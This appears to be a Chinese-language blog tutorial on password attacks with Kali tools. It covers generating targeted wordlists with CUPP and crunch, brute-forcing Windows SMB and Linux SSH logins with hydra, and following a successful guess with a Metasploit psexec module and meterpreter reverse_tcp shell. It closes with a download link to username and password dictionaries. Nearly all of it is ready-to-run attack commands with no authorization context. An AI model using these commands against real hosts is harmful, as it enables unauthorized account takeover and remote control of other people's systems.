目录
1.CUPP(kali)
首先,安装cupp软件
apt install -y cupp
编辑
新建一个文件夹,用于保存生成的字典
编辑
输入 cupp -i 命令开始编辑生成字典
编辑
根据自己已知的信息,生成字典。
编辑
查看生成的字典 cat san.txt
2.亦思社会工程学学点生成器
编辑
3.一句话密码破解工具
编辑
4.crunch(kali)
crunch是kali自带的工具,是一种创建密码字典的工具。按照指定的规则生成密码字典,可以灵活的定制自己的字典文件。
首先,先尝试一个简单的命令。如图所示。1 8表示密码是8位 后面的是密码的范围,我们可以看出按照这种方式输出的字典有23TB。(切记,运行一下立马暂停,否则会卡死)
编辑
查看帮助
man crunch > crunch.help
命令格式
crunch <min-len> <max-len> [<charset string>] [options]
参数说明
min-len 设定最小字符串长度(必选) max-len 设定最大字符串长度(必选) charset string 字符集 options -b 指定文件输出的大小,避免字典文件过大 -c 指定文件输出的行数,即包含密码的个数 -d 限制相同元素出现的次数 -e 定义停止字符,即到该字符串就停止生成 -f 调用库文件
特殊字符
% 代表数字 ^ 代表特殊符号 @ 代表小写字母 , 代表大写字母
查看库文件
cat /usr/share/crunch/charset.lst
如图所示,前面显示的名称,后面显示的内容是字符集 。这些都是设置好的,我们也可以自定义写一个字符集。
编辑
例子1:生成-1-8位密码字典,字符集合为小写字母,从a开始到zzzzzzzz结束
crunch 1 8
编辑
例子2:生成1-6位的密码字典,字符集合为[abcdefg],从a开始到gggggg结束
crunch 1 6 abcdefg
编辑
例子3:生成指定字符串,比如生日的日期(%代表数字)
crunch 8 8 -t 199307%% -e 19930730
编辑
例子4:生成元素的组合,比如123.com
crunch 7 7 -t %%%.com -s 111.com -e 123.com
编辑
例子5:在字典中输出特殊字符
crunch 3 3 abc -t @@@ -l @aa
编辑
例子6: 以元素组合生成字典[zhangsan|1993|0701]
crunch 4 4 -p zhangsan 1992 0701
编辑
例子6:
自定义字符集合
vim /usr/share/crunch/charset.lst
创建自定义字符集合
添加一个字符集
编辑
使用自定义字符集生成[*.com] 字典文件
crunch 5 5 -f /usr/share/crunch/charset.lst test -t @.com
编辑
5.hydra(kali)
首先,先准备两个文件:常用的账号和密码文件。这个是我从github下载的,账号和密码都有几千条。文章最后,我会将文件下载地址分享一下。
编辑
windows口令破解
hydra -l ./user.txt -p ./pass.txt smb 192.168.0.110 -vV -f -e nsr
-l 指定一个用户名 -p 指定一个密码 -P 指定密码字典 -L 指定用户名字典 -vV 显示爆破细节 -o 保存爆破结果 -f 找到正确的密码就停止爆破 -e n null s same r 反向 -t 线程
爆破成功后,我们使用msf中的use exploit/windows/smb/psexec模块去链接。
建立payload set payload windows/meterpreter/reverse_tcp
编辑
查看需要配置的参数 show options
编辑
设置目标主机 set RHOSTS 192.168.0.110
设置账号和密码 set SMBPass xxx set SMBUser xxx
run或者exploit进行连接
linux口令破解
linux口令破解,也分为远程破解与本地破解。远程破解主要是爆破ssh服务,属于在线密码攻击。本地破解需要拿到linux的shadow文件,进行hash值破解,属于离线密码攻击。
破解ssh服务
hydra -l ./user.txt -p ./pass.txt ssh://127.0.0.1-vV -f -t 64
分享下载链接
亦思社会工程学字典生成器
一句话密码破解工具
常用的账号和密码字典
链接:https://pan.baidu.com/s/1ErRFv4vnpHZxIufOhCjK3g
提取码:bc9o
